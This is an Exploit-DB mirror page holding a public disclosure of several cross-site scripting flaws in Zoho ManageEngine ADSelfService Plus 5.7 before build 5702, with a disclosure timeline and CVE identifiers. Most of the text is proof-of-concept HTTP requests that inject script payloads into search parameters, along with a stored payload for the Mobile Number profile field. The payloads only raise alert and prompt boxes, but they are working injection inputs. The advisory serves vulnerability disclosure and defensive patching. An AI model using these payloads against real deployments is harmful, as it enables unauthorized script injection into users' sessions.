bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/46815.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

50 lines
No EOL
1.8 KiB
Text
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

[+] Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Multiple Cross-Site Scripting
[+] Author: Ibrahim Raafat
[+] Twitter: https://twitter.com/RaafatSEC
[+] Download: https://www.manageengine.com/products/self-service-password/download-free.html?
[+] TimeLine
[-] Nov 23, 2018 Reported
[-] Nov 26, 2018 Triaged
[-] Dec 27, 2018 Fixed
[-] May 08, 2019 Public Disclosure
[+] Description:
Zoho ManageEngine ADSelfService Plus 5.7 before build 5702 has Multiple XSS vulnerabilites
[+] POC
[-] Employee search form
POST /EmployeeSearch.cc?actionId=Search HTTP/1.1
searchString=dddddffff");a=alert,a(31337)//&&searchType=contains&searchBy=ALL_FIELDS333');a=alert,a(31337)//&adscsrf=
searchType parameter:
searchString=a&searchType=containss9ek";a=alert,a(31337)//&searchBy=ALL_FIELDS&adscsrf=
2- Employee Search ascending parameter
/EmployeeSearch.cc?actionId=showList&searchBy=ALL_FIELDS&searchType=contains&PAGE_NUMBER=37&FROM_INDEX=22&TO_INDEX=22&RANGE=100&navigate=true&navigationType=&START_INDEX=22 HTTP/1.1
selOUs=&genID=12191&ACTIVE_TAB=user&sortIndex=0&ascending=true;a=alert,a(31337)//&&searchString=a&TOTAL_RECORDS=22&adscsrf=
3- EmpSearch.cc - searchString parameter
POST /EmpSearch.cc?operation=getSearchResult&REQUEST_TYPE=JSON&searchString=RR<svg%2fonload%3dprompt(8)>&searchType=contains&searchBy=ALL_FIELDS&actionId=Search HTTP/1.1
&adscsrf=
4- Stored XSS in self-update layout implementation.
/SelfService.do?methodToCall=selfService&selectedTab=UpdateFields
Insert the following payload into Mobile Number field, and save
Payload: 11111111]";a=alert,a(31337)//
Code execute here:
/Enrollment.do?selectedTab=Enrollment
[+] Assigned CVE: CVE-2018-20484,CVE-2018-20485
[+] Release Notes: https://www.manageengine.com/products/self-service-password/release-notes.html
Reference in a new issue View git blame Copy permalink